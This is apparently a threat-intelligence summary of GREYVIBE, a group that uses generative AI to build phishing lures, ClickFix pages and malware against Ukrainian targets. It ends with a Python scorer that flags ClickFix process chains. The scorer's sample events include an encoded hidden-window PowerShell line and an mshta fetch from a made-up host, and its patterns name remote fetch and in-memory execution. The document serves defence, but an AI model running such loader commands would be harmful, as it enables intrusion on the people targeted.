Technical description
WithSecure published a detailed threat intelligence report on GREYVIBE, a previously undocumented Russia-nexus threat group that has been systematically using generative AI (ChatGPT, Gemini, Ideogram AI) across all operational phases since August 2025 — including fake website creation, spear-phishing lure crafting, custom malware development (PhantomRelay, LegionRelay, Fallspy), obfuscation scripts, and post-compromise tooling. Notably, the LegionRelay malware was likely LLM-assisted but contained design flaws that allowed WithSecure to monitor the group's activities over an extended period.
Attack vector
Multi-vector AI-assisted campaigns: spear-phishing emails impersonating Ukrainian entities (Kyiv City Council, energy companies, emergency services); ClickFix fake CAPTCHA pages; fake adult-club websites (PrincessClub campaign) delivering Android spyware (Fallspy). The group uses AI to accelerate tradecraft development, fill capability gaps, and generate a fresh operational profile that complicates attribution and tracking.
Affected systems
Ukrainian military, government, civilian, and business entities are primary targets. The group's AI-accelerated development model and operational profile represent a blueprint for how lower-sophistication actors globally will use LLMs to punch above their weight class.
Mitigation
Ingest the IOCs published in the WithSecure report into detection and blocking controls. Organizations outside Ukraine should treat this as a capability preview: AI-assisted social engineering will increase in sophistication and volume. Invest in AI-generated content detection for spear-phishing, ClickFix awareness training, and behavioral detection for loader-based malware chains that bypass signature-based detection.
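As an added example that is not from the WithSecure report or this page: a small Python scorer for the behavioral ClickFix pattern the mitigation section points at (the Run dialog is hosted by explorer.exe, so a pasted one-liner appears as explorer.exe spawning a script interpreter with encoded, hidden-window or remote-fetch flags), run over constructed process-creation events. All paths, hostnames and the base64 fragment are made up.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon Event ID 1 style fields);
# none of these values come from the WithSecure report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc QQBCAEMA"},   # dummy base64
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://captcha-check.invalid/verify.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},                           # user opened a console
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File build.ps1"},
]

# Interpreters a pasted ClickFix one-liner typically lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# Command-line traits of a pasted loader: encoded payload, hidden window,
# remote fetch, in-memory execution. Each match adds one point.
SUSPICIOUS = [
    re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I),
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"https?://", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
]

def score_event(event):
    """Return a score; 0 means the event does not fit the ClickFix pattern."""
    parent = PureWindowsPath(event["parent"]).name.lower()
    image = PureWindowsPath(event["image"]).name.lower()
    # Explorer-hosted Run dialog -> interpreter; tune the parent check to how
    # your EDR represents the Run dialog and terminal launches.
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return 0
    return sum(1 for pat in SUSPICIOUS if pat.search(event["cmdline"]))

def find_clickfix_candidates(events, threshold=1):
    """Return events scoring at or above threshold, highest score first."""
    scored = [(score_event(e), e) for e in events]
    return [e for s, e in sorted(scored, key=lambda h: -h[0]) if s >= threshold]

if __name__ == "__main__":
    for e in find_clickfix_candidates(SAMPLE_EVENTS):
        print(score_event(e), e["cmdline"])
```

The plain explorer-spawned console and the editor-spawned build script score 0, which is the noise-control the command-line requirement buys you over a bare parent/child rule.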